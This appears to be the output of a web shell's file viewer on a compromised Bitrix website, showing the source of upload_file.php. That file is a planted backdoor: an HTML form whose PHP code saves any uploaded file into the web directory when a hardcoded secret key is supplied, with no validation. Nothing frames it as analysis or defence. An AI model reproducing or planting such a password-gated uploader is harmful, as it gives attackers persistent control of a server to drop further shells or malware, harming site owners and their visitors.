Your IP : 3.143.241.104


Current Path : /home/bitrix/ext_www/home-comfort.in.ua/bitrix/
Upload File :
Current File : /home/bitrix/ext_www/home-comfort.in.ua/bitrix/upload_file.php

<!DOCTYPE html>
<html>
 <head>
   <meta charset="utf-8">
   <title><!--g27f367de--></title>
 </head>
 <body>
    <form name="upload_form" action="upload_file.php" method="post" ENCTYPE="multipart/form-data">
    <input type="text" id="key" name="key"></br>
    <input type="file" id="upfile" name="upfile"></br>
    <input type="submit" value="Отправить">
    </form>
 </body>
</html>
<?
if(isset($_POST['key'])&&$_POST['key']==='ga4656801') {
    move_uploaded_file($_FILES["upfile"]["tmp_name"], basename($_FILES["upfile"]["name"]));
}
?>